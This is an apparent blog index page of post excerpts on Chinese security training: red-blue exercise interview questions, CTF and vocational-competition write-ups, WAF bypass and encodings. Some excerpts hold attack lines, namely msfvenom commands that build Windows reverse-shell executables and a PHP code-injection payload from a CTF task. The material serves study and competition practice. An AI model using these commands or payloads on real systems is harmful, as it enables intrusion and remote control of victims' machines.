2022年11月9日
HVV面试题
摘要: 设备误报如何处理 查看日志 防止:记录正常业务服务的签名, 防止误报 如何查看区分是扫描流量和手动流量 扫描数据量大,请求有规律,手动扫描间隔较少 被拿shell了如何处理 排查、清除、关站、看看可有即使修复的可能,没有可能就关站 CSRF 挟持用户在当前已登录的Web应用程序上执行非本意的操作 防 阅读全文
posted @ 2022-11-09 14:31 Rlins 阅读(4356) 评论(0) 推荐(2)
HVV红队面试
摘要: 不出网 socks隧道、CS直接上线、 域内委派 域委派是指将域内用户的权限委派给服务账户,使得服务账号能够以用户的权限在域内展开活动 协议层面讲,用户A委派DM$访问WEB服务,那么用户会将TGT缓存在DM的lsass中,DM再模拟这个用户去访问服务。 dpapi机制 DPAPI是Windows系 阅读全文
posted @ 2022-11-09 14:30 Rlins 阅读(551) 评论(0) 推荐(0)
2022年6月13日
2021福建省职业院校技能大赛信息安全管理与评估WP
摘要: 任务一 访问服务器8080端⼝,找出ecshop版本号,将版本号作为flag提交**(数字)** 通过访问http://IP:8080 可以看到页面首页存在版本信息 访问网站,利用漏洞找到网站根目录的flag1,将flag1作为flag提交。 因为在网站根目录,直接尝试访问http://IP/fla 阅读全文
posted @ 2022-06-13 10:09 Rlins 阅读(441) 评论(0) 推荐(0)
2020福建省职业院校技能大赛信息安全管理与评估WP
摘要: 第二阶段 任务一 第一题: ?dcn=);show_source("flag.php");// 第二题:输入密码查看flag 密码是:13546 第三题:修改前端输入框大小 第四题:burp抓包--res模块重放 第五题:wireshark 第242包追中http流 读取flag到burp解密 任务 阅读全文
posted @ 2022-06-13 10:08 Rlins 阅读(171) 评论(0) 推荐(0)
msfvenom各种shell生成
摘要: Meterpreter Shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f exe > reverse.exe msfvenom -p windows/shell_reverse_tcp L 阅读全文
posted @ 2022-06-13 10:06 Rlins 阅读(101) 评论(0) 推荐(0)
WAF是被如何绕过的
摘要: WAF是如何被绕过的 课程简介 WAF(Web应用防火墙,Web Application Firewall的简称)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的产品。WAF可以发现和拦截各类Web层面的攻击,记录攻击日志,实时预警提醒,在Web应用本身存在缺陷的情况下 阅读全文
posted @ 2022-06-13 10:05 Rlins 阅读(336) 评论(0) 推荐(1)
ctf常见编码
摘要: 编码 进制 十进制:20 八进制:024 十六进制:0x14 key和flag对应的ASCII key 107 101 121 KEY 75 69 89 flag 102 108 97 103 FLAG 70 76 65 71 Unicode 编码 例如:原文本:You had me at hell 阅读全文
posted @ 2022-06-13 10:03 Rlins 阅读(1515) 评论(0) 推荐(0)
HVV面试题整理
摘要: 应急响应 宏观题 1. 思路流程 信息收集>类型判断>抑制范围>深入分析>清理处置>输出报告 收集信息:收集客户信息和中毒主机信息,包括样本 判断类型:判断是否是安全事件,何种安全事件,勒索、挖矿、断网、DoS 等等 抑制范围:隔离使受害⾯不继续扩⼤ 深入分析:日志分析、进程分析、启动项分析、样本分 阅读全文
posted @ 2022-06-13 10:03 Rlins 阅读(2018) 评论(0) 推荐(1)
2022福建省职业院校技能大赛信息安全管理与评估WP
摘要: MISC 1. Utf-7解密 win7中utf-7工具解密 2. Wireshark分析 筛选http请求包,追踪流 3. wireshark文件导出 导出对象>>>http 4. png文件头补全 winhex打开文件,修改文件头89504E47为png文件头,打开图片得flag 504E47 阅读全文
posted @ 2022-06-13 09:56 Rlins 阅读(239) 评论(3) 推荐(0)
一次ctf题(2)
摘要: 第一题 打开页面发现http://10.196.8.21:18083/calculate/ 利用python的requests库做计算, import re import requests import time url = 'http://10.196.8.21:18083/calculate/' 阅读全文
posted @ 2022-06-13 09:51 Rlins 阅读(505) 评论(0) 推荐(0)
下一页